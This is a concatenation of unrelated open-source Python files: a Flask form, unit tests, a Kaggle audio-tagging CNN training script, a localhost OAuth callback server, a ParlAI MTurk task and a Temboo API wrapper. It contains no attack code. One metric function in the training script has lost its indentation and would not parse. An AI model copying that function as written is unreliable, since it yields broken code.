            user = User.query.filter_by(email=email.data).first()
            if user:
                raise ValidationError('That email is taken. Please choose a different one')
class PostForm(FlaskForm):
    """Form for submitting a new prediction post.

    Accepts a single .tif file bundling the MSI, CWI and LAI satellite
    layers, a target country, and three fixed legend colours.
    """
    title = StringField('Title of prediction', validators=[DataRequired()])
    content = TextAreaField('Description of prediction', validators=[DataRequired()])
    picture = FileField('File (.tif) containing satellite data, MSI, CWI and LAI all in one',
                        validators=[FileAllowed(['tif'])])
    country = SelectField('Country of prediction', choices=[('Guinea', 'Guinea'), ('Congo', 'Congo')], validators=[DataRequired()])
    # Legend colours are fixed defaults; the fields render read-only.
    color1 = StringField('', default='#064518', validators=[DataRequired()], render_kw={'readonly': True})
    color2 = StringField('', default='#DEDC93', validators=[DataRequired()], render_kw={'readonly': True})
    color3 = StringField('', default='#A3A39B', validators=[DataRequired()], render_kw={'readonly': True})
    submit = SubmitField('Post')
| StarcoderdataPython |
69348 | <reponame>seryafarma/gaphor
from gaphor import UML
from gaphor.core.eventmanager import EventManager
from gaphor.core.modeling import ElementFactory
from gaphor.storage.verify import orphan_references
def test_verifier():
    """orphan_references() is False while every element lives in the factory
    and becomes True once an element created outside the factory references
    one inside it."""
    factory = ElementFactory(EventManager())

    klass = factory.create(UML.Class)
    attribute = factory.create(UML.Property)
    klass.ownedAttribute = attribute
    # Everything so far is factory-owned, so nothing is orphaned.
    assert not orphan_references(factory)

    # A comment built directly (not via the factory) is not part of the model.
    comment = UML.Comment(id="acd123")
    comment.annotatedElement = klass
    assert comment in klass.ownedComment
    assert orphan_references(factory)
| StarcoderdataPython |
9660467 | # ==================================================================================
# Baseline Model
# date : 2019/05/05
# reference : https://www.kaggle.com/mhiro2/simple-2d-cnn-classifier-with-pytorch
# comment : [change point] epoch {80 > 400}
# ==================================================================================
import gc
import os
import random
import time
from logging import getLogger, Formatter, FileHandler, StreamHandler, INFO, DEBUG
from pathlib import Path
from psutil import cpu_count
from functools import wraps, partial
from tqdm import tqdm
from fastprogress import master_bar, progress_bar
import numpy as np
import pandas as pd
from numba import jit
from PIL import Image
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.optim import Adam
from torch.optim.lr_scheduler import CosineAnnealingLR
from torch.utils.data import Dataset, DataLoader
from torchvision.transforms import transforms
# ================= #
#  params section   #
# ================= #
# When running inside a Kaggle kernel, enable the line below instead.
# IS_KERNEL = True
IS_KERNEL = False
# Version tag: first four characters of this file's name (e.g. "0123_foo.py" -> "0123").
VERSION = "0000" if IS_KERNEL else os.path.basename(__file__)[0:4]
IMAGE_VERSION = "1000"  # version tag of the pre-rendered spectrogram images
FOLD_NUM = 5  # number of cross-validation folds
ROOT_PATH = Path("..") if IS_KERNEL else Path(__file__).parents[1]
# Shadow torch's DataLoader with a variant that always uses all CPU cores.
DataLoader = partial(DataLoader, num_workers=cpu_count())
SEED = 1116  # global RNG seed for reproducibility

# Basic audio constants.
SAMPLING_RATE = 44100  # 44.1[kHz]
SAMPLE_DURATION = 2  # 2[sec]
N_MEL = 128  # spectrogram y axis size
# =============== #
# util function #
# =============== #
def get_logger(is_torch=False):
    """Return the run logger, or the bare-format "torch" metrics logger when
    *is_torch* is True (both are configured by create_logger())."""
    logger_name = ("torch" + VERSION) if is_torch else VERSION
    return getLogger(logger_name)
def stop_watch(*dargs, **dkargs):
    """Decorator factory: log "[Start]"/"[Finish]" lines around the wrapped call.

    Usage: ``@stop_watch("section name")`` -- the first positional argument is
    the label used in the log lines; elapsed time is logged as HH:MM:SS.
    """
    def decorator(func):
        @wraps(func)
        def wrapper(*args, **kargs):
            label = dargs[0]
            started_at = time.time()
            get_logger().info("[Start] {}".format(label))
            result = func(*args, **kargs)
            total_seconds = int(time.time() - started_at)
            minutes, seconds = divmod(total_seconds, 60)
            hours, minutes = divmod(minutes, 60)
            get_logger().info("[Finish] {}: [elapsed_time] {:0>2}:{:0>2}:{:0>2}".format(label, hours, minutes, seconds))
            return result
        return wrapper
    return decorator
# ======================= #
# preprocessing section #
# ======================= #
# ref : https://www.kaggle.com/daisukelab/creating-fat2019-preprocessed-data
# >> data select section
def select_train_data():
    """Load the curated-training fold assignments and attach, per row, the
    path of the pre-rendered spectrogram image.

    :return: DataFrame with columns ["fpath", "labels", "fold"]
    """
    fold_csv = ROOT_PATH / "data" / "fold" / "train_curated_sfk.csv"
    image_root = (ROOT_PATH / "image" / IMAGE_VERSION).absolute()

    # train curated subset only; "foo.wav" -> <image_root>/train_curated/foo.png
    curated = pd.read_csv(fold_csv)[["fname", "labels", "fold"]]
    curated["fpath"] = str(image_root) + "/train_curated/" + curated["fname"].str[:-4] + ".png"

    # (A noisy-training subset could be concatenated here as well.)
    return curated[["fpath", "labels", "fold"]]
# << data select section
# >> label convert section
def label_to_array(label):
    """Convert a comma-separated tag string into a binary indicator vector.

    The tag vocabulary (the 80 columns of sample_submission.csv) is read once
    and cached on the function object; the original re-read the CSV on every
    call and carried a numba ``@jit("i1[:](i1[:])")`` decorator whose int8
    signature did not match the actual (str -> int array) types, so the
    decorator was dropped.

    :param label: tags joined by commas, e.g. "Bark,Meow"
    :return: numpy int array with 1 at the index of each present tag
    """
    tag_list = getattr(label_to_array, "_tag_list", None)
    if tag_list is None:
        # 80 tag list, loaded lazily and cached after the first call.
        tag_list = pd.read_csv(ROOT_PATH / "input" / "sample_submission.csv").columns[1:].tolist()
        label_to_array._tag_list = tag_list
    array = np.zeros(len(tag_list)).astype(int)
    for tag in label.split(","):
        array[tag_list.index(tag)] = 1
    return array
# << label convert section
# >> dataset section
@stop_watch("load train image")
def df_to_labeldata(fpath_arr, labels):
    """Load spectrogram images and encode their labels for training.

    Fix: the original wrapped the loop in a nested numba ``@jit`` function;
    numba cannot compile PIL calls and list appends, so the decorator only
    forced object-mode fallback and was removed.

    :param fpath_arr: sequence of spectrogram image paths
    :param labels: sequence of comma-separated tag strings (same length)
    :return: (list of HxWx3 image arrays, list of binary label vectors)
    """
    spec_list = []
    label_list = []
    for fpath, label in tqdm(zip(fpath_arr, labels), total=len(fpath_arr)):
        # melspectrogram rendered as an RGB image
        spec_list.append(np.asarray(Image.open(fpath)))
        # labels -> multi-hot indicator vector
        label_list.append(label_to_array(label))
    return spec_list, label_list
class TrainDataset(Dataset):
    """
    train_df :columns=["fpath", "labels"]
    """
    # Loads every spectrogram image into memory up front and serves random
    # square crops (along the time axis) plus multi-hot label vectors.

    def __init__(self, train_path_arr, train_y, transform):
        super().__init__()
        self.transforms = transform
        # melspectrograms: list of HxWx3 image arrays; labels: list of 0/1 vectors
        self.melspectrograms, self.labels = df_to_labeldata(train_path_arr, train_y)

    def __len__(self):
        return len(self.melspectrograms)

    def __getitem__(self, idx):
        # Take a random square window along the time axis so every sample has
        # the same (base_dim x base_dim) size.
        image = Image.fromarray(self.melspectrograms[idx], mode="RGB")
        time_dim, base_dim = image.size
        # assumes time_dim >= base_dim -- TODO confirm for very short clips
        crop = random.randint(0, time_dim - base_dim)
        image = image.crop([crop, 0, crop + base_dim, base_dim])
        image = self.transforms(image).div_(255)  # scale uint8 -> [0, 1]

        label = self.labels[idx]
        label = torch.from_numpy(label).float()
        return image, label
# << dataset section
# =============== #
# model section #
# =============== #
class ConvBlock(nn.Module):
    """Two 3x3 conv + batch-norm + ReLU layers followed by 2x2 average pooling.

    Maps in_channels -> out_channels and halves the spatial resolution.
    """

    def __init__(self, in_channels, out_channels):
        super().__init__()
        # Attribute names (conv1/conv2) are kept so state_dict keys stay stable.
        self.conv1 = self._conv_bn_relu(in_channels, out_channels)
        self.conv2 = self._conv_bn_relu(out_channels, out_channels)
        self._init_weights()

    @staticmethod
    def _conv_bn_relu(in_channels, out_channels):
        """Build one 3x3 (stride 1, padding 1) conv -> batch-norm -> ReLU stack."""
        return nn.Sequential(
            nn.Conv2d(in_channels, out_channels, 3, 1, 1),
            nn.BatchNorm2d(out_channels),
            nn.ReLU()
        )

    def _init_weights(self):
        """Kaiming-normal init for convs; unit-scale/zero-shift for batch norms."""
        for module in self.modules():
            if isinstance(module, nn.Conv2d):
                nn.init.kaiming_normal_(module.weight)
                if module.bias is not None:
                    nn.init.zeros_(module.bias)
            elif isinstance(module, nn.BatchNorm2d):
                nn.init.constant_(module.weight, 1)
                nn.init.zeros_(module.bias)

    def forward(self, x):
        out = self.conv2(self.conv1(x))
        return F.avg_pool2d(out, 2)
class Classifier(nn.Module):
    """Four-stage ConvBlock backbone + global pooling + two-layer MLP head.

    Input: (N, 3, H, W) spectrogram crops; output: (N, num_classes) logits.
    """

    def __init__(self, num_classes):
        super().__init__()
        # Attribute names (conv/fc) are kept so state_dict keys stay stable.
        channel_plan = [(3, 64), (64, 128), (128, 256), (256, 512)]
        self.conv = nn.Sequential(
            *[ConvBlock(in_channels=c_in, out_channels=c_out) for c_in, c_out in channel_plan]
        )
        self.fc = nn.Sequential(
            nn.Dropout(0.2),
            nn.Linear(512, 128),
            nn.PReLU(),
            nn.BatchNorm1d(128),
            nn.Dropout(0.1),
            nn.Linear(128, num_classes)
        )

    def forward(self, x):
        features = self.conv(x)
        # Global pooling: mean over time (dim 3), then max over frequency (dim 2).
        pooled = torch.mean(features, dim=3)
        pooled, _ = torch.max(pooled, dim=2)
        return self.fc(pooled)
# ================ #
# metric section #
# ================ #
# from official code https://colab.research.google.com/drive/1AgPdhSp7ttY18O3fEoHOQKlt_3HJDLi8#scrollTo=cRCaCIb9oguU
@jit
def _one_sample_positive_class_precisions(scores, truth):
"""Calculate precisions for each true class for a single sample.
Args:
scores: np.array of (num_classes,) giving the individual classifier scores.
truth: np.array of (num_classes,) bools indicating which classes are true.
Returns:
pos_class_indices: np.array of indices of the true classes for this sample.
pos_class_precisions: np.array of precisions corresponding to each of those
classes.
"""
num_classes = scores.shape[0]
pos_class_indices = np.flatnonzero(truth > 0)
# Only calculate precisions if there are some true classes.
if not len(pos_class_indices):
return pos_class_indices, np.zeros(0)
# Retrieval list of classes for this sample.
retrieved_classes = np.argsort(scores)[::-1]
# class_rankings[top_scoring_class_index] == 0 etc.
class_rankings = np.zeros(num_classes, dtype=np.int)
class_rankings[retrieved_classes] = range(num_classes)
# Which of these is a true label?
retrieved_class_true = np.zeros(num_classes, dtype=np.bool)
retrieved_class_true[class_rankings[pos_class_indices]] = True
# Num hits for every truncated retrieval list.
retrieved_cumulative_hits = np.cumsum(retrieved_class_true)
# Precision of retrieval list truncated at each hit, in order of pos_labels.
precision_at_hits = (retrieved_cumulative_hits[class_rankings[pos_class_indices]] / (1 + class_rankings[pos_class_indices].astype(np.float)))
return pos_class_indices, precision_at_hits
def calculate_per_class_lwlrap(truth, scores):
    """Calculate label-weighted label-ranking average precision.

    (The numba ``@jit`` decorator was removed for consistency with the fixed
    helper: the loop dispatches into numpy and a plain Python helper, so
    jitting only forced object-mode fallback.)

    Arguments:
      truth: np.array of (num_samples, num_classes) giving boolean ground-truth
        of presence of that class in that sample.
      scores: np.array of (num_samples, num_classes) giving the classifier-under-
        test's real-valued score for each class for each sample.
    Returns:
      per_class_lwlrap: np.array of (num_classes,) giving the lwlrap for each
        class.
      weight_per_class: np.array of (num_classes,) giving the prior of each
        class within the truth labels.  The overall unbalanced lwlrap is
        simply np.sum(per_class_lwlrap * weight_per_class).
    """
    assert truth.shape == scores.shape
    num_samples, num_classes = scores.shape
    # A distinct precision value for each true class on each sample; entries
    # for classes that are not true for a sample stay zero.
    precisions_for_samples_by_classes = np.zeros((num_samples, num_classes))
    for sample_num in range(num_samples):
        pos_class_indices, precision_at_hits = (
            _one_sample_positive_class_precisions(scores[sample_num, :],
                                                  truth[sample_num, :]))
        precisions_for_samples_by_classes[sample_num, pos_class_indices] = (
            precision_at_hits)
    labels_per_class = np.sum(truth > 0, axis=0)
    weight_per_class = labels_per_class / float(np.sum(labels_per_class))
    # Average each column, i.e. all the precisions assigned to labels in a
    # particular class, guarding against empty classes with maximum(1, .).
    per_class_lwlrap = (np.sum(precisions_for_samples_by_classes, axis=0)
                        / np.maximum(1, labels_per_class))
    # overall_lwlrap = simple average of all the actual per-class, per-sample precisions
    #  = np.sum(precisions_for_samples_by_classes) / np.sum(precisions_for_samples_by_classes > 0)
    #  also = weighted mean of per-class lwlraps, weighted by class label prior across samples
    #  = np.sum(per_class_lwlrap * weight_per_class)
    return per_class_lwlrap, weight_per_class
# =============== #
# train section #
# =============== #
@stop_watch("train section")
def train_model(train_df, train_transforms, fold):
    """Train the Classifier on one cross-validation fold.

    :param train_df: DataFrame with columns ["fpath", "labels", "fold"]
    :param train_transforms: torchvision transform applied to each crop
    :param fold: fold index held out for validation (the rest is training data)
    :return: dict with "best_epoch" and "best_lwlrap" for this fold
    """
    get_logger().info("[start] >> {} fold".format(fold))
    # Hyper-parameters for this run.
    num_epochs = 400
    batch_size = 64
    test_batch_size = 256
    lr = 3e-3
    eta_min = 1e-5  # floor of the cosine-annealed learning rate
    t_max = 10  # cosine annealing half-period (epochs)
    # Number of target tags (80), read from the submission header.
    num_classes = len(pd.read_csv(ROOT_PATH / "input" / "sample_submission.csv").columns[1:])
    # Train on every fold except `fold`; validate on `fold` itself.
    trn_data = train_df.query("fold != {}".format(fold))
    trn_x = trn_data["fpath"].values
    trn_y = trn_data["labels"].values
    val_data = train_df.query("fold == {}".format(fold))
    val_x = val_data["fpath"].values
    val_y = val_data["labels"].values
    train_dataset = TrainDataset(trn_x, trn_y, train_transforms)
    valid_dataset = TrainDataset(val_x, val_y, train_transforms)
    train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True)
    valid_loader = DataLoader(valid_dataset, batch_size=test_batch_size, shuffle=False)
    model = Classifier(num_classes=num_classes).cuda()
    # Multi-label task: binary cross-entropy on logits, one output per tag.
    criterion = nn.BCEWithLogitsLoss().cuda()
    optimizer = Adam(params=model.parameters(), lr=lr, amsgrad=False)
    scheduler = CosineAnnealingLR(optimizer, T_max=t_max, eta_min=eta_min)
    best_epoch = -1
    best_lwlrap = 0.
    mb = master_bar(range(num_epochs))
    for epoch in mb:
        start = time.time()
        # --- train phase ---
        model.train()
        avg_loss = 0.
        for x_batch, y_batch in progress_bar(train_loader, parent=mb):
            preds = model(x_batch.cuda())
            loss = criterion(preds, y_batch.cuda())
            optimizer.zero_grad()
            loss.backward()
            optimizer.step()
            avg_loss += loss.item() / len(train_loader)
        # --- validation phase ---
        model.eval()
        valid_preds = np.zeros((len(val_x), num_classes))
        avg_val_loss = 0.
        for i, (x_batch, y_batch) in enumerate(valid_loader):
            preds = model(x_batch.cuda()).detach()
            loss = criterion(preds, y_batch.cuda())
            preds = torch.sigmoid(preds)  # logits -> per-tag probabilities
            valid_preds[i * test_batch_size: (i + 1) * test_batch_size] = preds.cpu().numpy()
            avg_val_loss += loss.item() / len(valid_loader)
        # Competition metric: label-weighted label-ranking average precision.
        val_labels = np.array([label_to_array(l) for l in val_y.tolist()])
        score, weight = calculate_per_class_lwlrap(val_labels, valid_preds)
        lwlrap = (score * weight).sum()
        scheduler.step()
        elapsed = time.time() - start
        # Per-epoch metrics go to the bare-format "torch" logger (TSV-like lines).
        get_logger(is_torch=True).debug("{}\t{}\t{}\t{}".format(avg_loss, avg_val_loss, lwlrap, elapsed))
        if (epoch + 1) % 10 == 0:
            mb.write(f"Epoch {epoch + 1} -\tavg_train_loss: {avg_loss:.4f}\tavg_val_loss: {avg_val_loss:.4f}\tval_lwlrap: {lwlrap:.6f}\ttime: {elapsed:.0f}s")
        # Checkpoint whenever the validation lwlrap improves.
        if lwlrap > best_lwlrap:
            best_epoch = epoch + 1
            best_lwlrap = lwlrap
            model_path = "weight_best_{}.pt".format(fold) if IS_KERNEL else (ROOT_PATH / "model" / "{}_weight_best_{}.pt".format(VERSION, fold)).resolve()
            torch.save(model.state_dict(), model_path)
    get_logger().info("[ end ] >> {} fold".format(fold))
    get_logger(is_torch=True).info("")
    return {
        "best_epoch": best_epoch,
        "best_lwlrap": best_lwlrap
    }
# ================ #
# logger section #
# ================ #
def create_logger():
    """Configure the run logger and the bare-format "torch" metrics logger.

    Both loggers echo INFO+ to the console; outside of a Kaggle kernel they
    additionally write DEBUG+ to log/<VERSION>.log and log/<VERSION>_torch.log
    (truncated on every run).
    """
    run_format = Formatter("[%(levelname)s] %(asctime)s >> \t%(message)s")

    # Shared console handler for both loggers.
    console = StreamHandler()
    console.setLevel(INFO)
    console.setFormatter(run_format)

    run_logger = getLogger(VERSION)
    run_logger.setLevel(DEBUG)
    run_logger.addHandler(console)

    metrics_logger = getLogger("torch" + VERSION)
    metrics_logger.setLevel(DEBUG)
    metrics_logger.addHandler(console)

    # File output is only available outside the Kaggle kernel sandbox.
    if IS_KERNEL:
        return

    log_dir = ROOT_PATH / "log"
    log_dir.mkdir(exist_ok=True, parents=True)

    def attach_file_handler(logger, path, formatter):
        # Create/truncate the file and stream DEBUG+ records into it.
        path.touch()
        handler = FileHandler(path, mode="w")
        handler.setLevel(DEBUG)
        handler.setFormatter(formatter)
        logger.addHandler(handler)

    attach_file_handler(run_logger, log_dir / "{}.log".format(VERSION), run_format)
    attach_file_handler(metrics_logger, log_dir / "{}_torch.log".format(VERSION),
                        Formatter("%(message)s"))
# ===================== #
# pre setting section #
# ===================== #
def seed_everything():
    """Seed every RNG in use (python, hash, numpy, torch CPU+CUDA) with SEED.

    Bug fix: the original set ``torch.backends.cudnn.daterministic`` (typo),
    which silently created an unused attribute instead of enabling
    deterministic cuDNN kernels.
    """
    random.seed(SEED)
    os.environ["PYTHONHASHSEED"] = str(SEED)
    np.random.seed(SEED)
    torch.manual_seed(SEED)
    torch.cuda.manual_seed(SEED)
    torch.backends.cudnn.deterministic = True
def jobs_manage(n_jobs=cpu_count()):
    """Cap the MKL/OpenMP thread pools at *n_jobs* (defaults to all CPU cores)."""
    thread_count = str(n_jobs)
    for env_var in ("MKL_NUM_THREADS", "OMP_NUM_THREADS"):
        os.environ[env_var] = thread_count
# ============== #
# main section #
# ============== #
@stop_watch("main function")
def main():
    """Run FOLD_NUM-fold training end-to-end and log per-fold and mean lwlrap."""
    # Reproducibility and thread settings first.
    seed_everything()
    jobs_manage()

    train_df = select_train_data()
    augmentations = transforms.Compose([
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor()
    ])

    mean_lwlrap = 0
    for fold in range(FOLD_NUM):
        fold_result = train_model(train_df, augmentations, fold)
        get_logger().info("[fold {}]best_epoch : {},\tbest_lwlrap : {}".format(fold, fold_result["best_epoch"], fold_result["best_lwlrap"]))
        mean_lwlrap += fold_result["best_lwlrap"] / FOLD_NUM
    get_logger().info("[result]best_lwlrap : {}".format(mean_lwlrap))
# Script entry point: enable gc, configure logging, and surface any failure
# in the run log before re-raising it.
if __name__ == "__main__":
    gc.enable()
    create_logger()
    try:
        main()
    except Exception as e:
        # Record the failure in the run log, then propagate to the caller.
        get_logger().error("Exception Occured. \n>> \n {}".format(e))
        raise e
| StarcoderdataPython |
4850886 | from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs
AUTHORIZATION_CODE = None
class TerminateHTTPServer(KeyboardInterrupt):
    """Raised by the request handler to stop the HTTP server gracefully.

    ``serve_forever`` only stops when an exception escapes request handling,
    and ``get_authorization_code`` catches KeyboardInterrupt around it.
    Subclassing KeyboardInterrupt lets a plain ``raise TerminateHTTPServer``
    reach that handler directly, replacing the original hack of raising
    KeyboardInterrupt from inside ``__init__``.
    """
class WebServer(BaseHTTPRequestHandler):
    """Minimal OAuth redirect handler.

    Waits for the provider to redirect the browser to
    ``http://localhost:<port>/?code=...``, stores the code in the module-level
    AUTHORIZATION_CODE, and terminates the server.
    """

    def _set_response(self, code):
        # Send the status line plus a minimal HTML content-type header.
        self.send_response(code)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_GET(self):
        global AUTHORIZATION_CODE
        parsed_url = urlparse(self.path)
        query_params = parse_qs(parsed_url.query)
        # parse_qs returns a list per key; unwrapped in get_authorization_code.
        AUTHORIZATION_CODE = query_params.get("code", None)
        self._set_response(code=200)
        if AUTHORIZATION_CODE:
            self.wfile.write(f"Authentication Successful. You can close this tab now".encode('utf-8'))
            # Stop serve_forever once the code has been captured.
            raise TerminateHTTPServer

    def do_POST(self):
        # POST is not part of the redirect flow: drain the request body so the
        # socket is left in a clean state, then reply 405 Method Not Allowed.
        content_length = int(self.headers['Content-Length'])
        post_data = self.rfile.read(content_length)
        self.send_error(405)
def get_authorization_code(server_class=HTTPServer, handler_class=WebServer, port=8239):
    """Serve HTTP until the OAuth redirect delivers a ``code`` query parameter.

    Blocks in ``serve_forever`` until the handler raises TerminateHTTPServer
    (a KeyboardInterrupt) or the user hits Ctrl-C.

    Fixes vs. the original: the listening socket is closed in a ``finally``
    block, and an interrupt that arrives before any code was captured returns
    None instead of crashing with ``TypeError: 'NoneType' object is not
    subscriptable`` on ``AUTHORIZATION_CODE[0]``.

    :return: the authorization code string, or None if none arrived
    """
    server_address = ('', port)
    httpd = server_class(server_address, handler_class)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    finally:
        httpd.server_close()
    return AUTHORIZATION_CODE[0] if AUTHORIZATION_CODE else None
| StarcoderdataPython |
193112 | <reponame>takatoy/ParlAI
# Copyright (c) Facebook, Inc. and its affiliates.
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from parlai.core.params import ParlaiParser
from parlai.mturk.core.mturk_manager import MTurkManager
from parlai.tasks.image_chat.agents import ImageChatTeacher
from worlds import (
MTurkImageChatWorld,
RoleOnboardWorld,
PersonalityGenerator,
ExampleGenerator,
RESPONDER,
)
from task_configs.task_config_first_response import task_config as config_first
from task_configs.task_config_second_response import task_config as config_second
import os
def main():
    """
    Image Chat data collection task.

    A worker is shown an image and part of a conversation, and is given a personality
    with which the worker should continue the conversation.
    """
    # --- command-line setup -------------------------------------------------
    argparser = ParlaiParser(False, False)
    argparser.add_parlai_data_path()
    argparser.add_mturk_args()
    argparser.add_argument(
        '-min_t', '--min_turns', default=3, type=int, help='minimum number of turns'
    )
    argparser.add_argument(
        '-mt', '--max_turns', default=5, type=int, help='maximal number of chat turns'
    )
    argparser.add_argument(
        '-mx_rsp_time',
        '--max_resp_time',
        default=1800,
        type=int,
        help='time limit for entering a dialog message',
    )
    argparser.add_argument(
        '-mx_onb_time',
        '--max_onboard_time',
        type=int,
        default=300,
        help='time limit for turker' 'in onboarding',
    )
    argparser.add_argument(
        '-ni',
        '--num_images',
        type=int,
        default=10,
        help='number of images to show \
        to turker',
    )
    argparser.add_argument(
        '--auto-approve-delay',
        type=int,
        default=3600 * 24 * 5,
        help='how long to wait for \
        auto approval',
    )
    argparser.add_argument(
        '--second-response',
        type='bool',
        default=False,
        help='Specify if getting responses \
        to responses to original comment',
    )
    ImageChatTeacher.add_cmdline_args(argparser)
    opt = argparser.parse_args()
    # The task name is the directory this script lives in.
    directory_path = os.path.dirname(os.path.abspath(__file__))
    opt['task'] = os.path.basename(directory_path)
    if 'data_path' not in opt:
        opt['data_path'] = os.getcwd() + '/data/' + opt['task']
    # Choose the first- or second-response task configuration.
    opt.update(config_second if opt['second_response'] else config_first)
    # --- MTurk setup --------------------------------------------------------
    mturk_agent_ids = [RESPONDER]
    mturk_manager = MTurkManager(opt=opt, mturk_agent_ids=mturk_agent_ids)
    personality_generator = PersonalityGenerator(opt)
    example_generator = ExampleGenerator(opt)
    mturk_manager.setup_server(task_directory_path=directory_path)
    try:
        mturk_manager.start_new_run()
        mturk_manager.ready_to_accept_workers()

        def run_onboard(worker):
            # Attach generators to the worker and walk it through onboarding.
            worker.personality_generator = personality_generator
            worker.example_generator = example_generator
            world = RoleOnboardWorld(opt, worker)
            world.parley()
            world.shutdown()

        mturk_manager.set_onboard_function(onboard_function=run_onboard)
        mturk_manager.create_hits()

        def check_worker_eligibility(worker):
            # Every onboarded worker is eligible.
            return True

        def assign_worker_roles(workers):
            # Single-role task: everyone is a responder.
            for w in workers:
                w.id = mturk_agent_ids[0]

        def run_conversation(mturk_manager, opt, workers):
            # Run one full chat episode, then persist and review the work.
            agents = workers[:]
            conv_idx = mturk_manager.conversation_index
            world = MTurkImageChatWorld(
                opt, agents=agents, world_tag='conversation t_{}'.format(conv_idx)
            )
            while not world.episode_done():
                world.parley()
            world.save_data()
            world.shutdown()
            world.review_work()

        mturk_manager.start_task(
            eligibility_function=check_worker_eligibility,
            assign_role_function=assign_worker_roles,
            task_function=run_conversation,
        )
    except BaseException:
        raise
    finally:
        # Always clean up outstanding HITs and shut the manager down.
        mturk_manager.expire_all_unassigned_hits()
        mturk_manager.shutdown()
# Script entry point.
if __name__ == '__main__':
    main()
| StarcoderdataPython |
9683605 | <filename>videoframe.py
import cv2
def saveFramestoImages(videopath, outdirName):
    """Write every frame of the video at *videopath* into *outdirName* as
    frame0.jpg, frame1.jpg, ...

    Fixes vs. the original: the stray ``success = True`` after the first read
    is removed (it forced loop entry even when the video could not be read,
    crashing ``cv2.imwrite`` with a None image), the capture handle is
    released when done, and Python 3 print syntax is used.
    """
    vidcap = cv2.VideoCapture(videopath)
    success, image = vidcap.read()
    count = 0
    while success:
        cv2.imwrite("{}/frame{}.jpg".format(outdirName, count), image)  # save frame as JPEG file
        success, image = vidcap.read()
        print('Read a new frame: ', success)
        count += 1
    vidcap.release()
# Extract frames from the demo videos into per-video output folders.
saveFramestoImages('assets/cspan.mp4','frames')
saveFramestoImages('assets/sarah.mp4','framessarah') | StarcoderdataPython |
1640975 | <filename>gpfit/tests/test_evaluate.py<gh_stars>1-10
"Test evaluate methods"
import unittest
from numpy import arange, newaxis
from gpfit.fit import MaxAffine, SoftmaxAffine, ImplicitSoftmaxAffine
class TestMaxAffine(unittest.TestCase):
"Test max_affine"
x = arange(0.0, 16.0)[:, newaxis]
ba = arange(1.0, 7.0).reshape(2, 3)
y, dydba = MaxAffine.evaluate(x, ba)
def test_y_size(self):
self.assertEqual(self.y.size, self.x.size)
def test_y_ndim(self):
self.assertEqual(self.y.ndim, 1)
def test_dydba_shape(self):
self.assertEqual(self.dydba.shape, (self.x.size, self.ba.size))
def test_dydba_ndim(self):
self.assertEqual(self.dydba.ndim, 2)
class TestSoftmaxAffine(unittest.TestCase):
"Tests softmax_affine"
x = arange(0.0, 16.0)[:, newaxis]
params = arange(1.0, 6.0)
y, dydp = SoftmaxAffine.evaluate(x, params)
def test_y_size(self):
self.assertEqual(self.y.size, self.x.size)
def test_y_ndim(self):
self.assertEqual(self.y.ndim, 1)
def test_dydp_shape(self):
self.assertEqual(self.dydp.shape, (self.x.size, self.params.size))
def test_dydp_ndim(self):
self.assertEqual(self.dydp.ndim, 2)
class TestImplicitSoftmaxAffine(unittest.TestCase):
"Tests implicit_softmax_affine"
x = arange(0.0, 16.0)[:, newaxis]
params = arange(1.0, 7.0)
y, dydp = ImplicitSoftmaxAffine.evaluate(x, params)
def test_y_size(self):
self.assertEqual(self.y.size, self.x.size)
def test_y_ndim(self):
self.assertEqual(self.y.ndim, 1)
def test_dydp_shape(self):
self.assertEqual(self.dydp.shape, (self.x.size, self.params.size))
def test_dydp_ndim(self):
self.assertEqual(self.dydp.ndim, 2)
TESTS = [
TestMaxAffine,
TestSoftmaxAffine,
TestImplicitSoftmaxAffine,
]
if __name__ == "__main__":
SUITE = unittest.TestSuite()
LOADER = unittest.TestLoader()
for t in TESTS:
SUITE.addTests(LOADER.loadTestsFromTestCase(t))
unittest.TextTestRunner(verbosity=2).run(SUITE)
| StarcoderdataPython |
6546650 | # -*- coding: utf-8 -*-
###############################################################################
#
# WriteLocationData
# Allows you to easily update the location data of your feed.
#
# Python versions 2.6, 2.7, 3.x
#
# Copyright 2014, Temboo Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND,
# either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
#
#
###############################################################################
from temboo.core.choreography import Choreography
from temboo.core.choreography import InputSet
from temboo.core.choreography import ResultSet
from temboo.core.choreography import ChoreographyExecution
import json
# Temboo-generated Choreo wrapper for the Xively "WriteLocationData" endpoint.
class WriteLocationData(Choreography):

    def __init__(self, temboo_session):
        """
        Create a new instance of the WriteLocationData Choreo. A TembooSession object, containing a valid
        set of Temboo credentials, must be supplied.
        """
        super(WriteLocationData, self).__init__(temboo_session, '/Library/Xively/ReadWriteData/WriteLocationData')

    def new_input_set(self):
        # Factory for the input container used to set this Choreo's parameters.
        return WriteLocationDataInputSet()

    def _make_result_set(self, result, path):
        # Internal factory used by the framework to wrap raw results.
        return WriteLocationDataResultSet(result, path)

    def _make_execution(self, session, exec_id, path):
        # Internal factory used by the framework for async executions.
        return WriteLocationDataChoreographyExecution(session, exec_id, path)
# Temboo-generated input container: each setter forwards a named input value
# to the base class via _set_input.
class WriteLocationDataInputSet(InputSet):
    """
    An InputSet with methods appropriate for specifying the inputs to the WriteLocationData
    Choreo. The InputSet object is used to specify input parameters when executing this Choreo.
    """
    def set_APIKey(self, value):
        """
        Set the value of the APIKey input for this Choreo. ((required, string) The API Key provided by Xively.)
        """
        super(WriteLocationDataInputSet, self)._set_input('APIKey', value)
    def set_Disposition(self, value):
        """
        Set the value of the Disposition input for this Choreo. ((optional, string) Can be set to "mobile" to enable creating waypoints (lat, lon and elevation with timestamp), or "fixed" (default) for a single location. Leave empty to keep existing settings.)
        """
        super(WriteLocationDataInputSet, self)._set_input('Disposition', value)
    def set_Domain(self, value):
        """
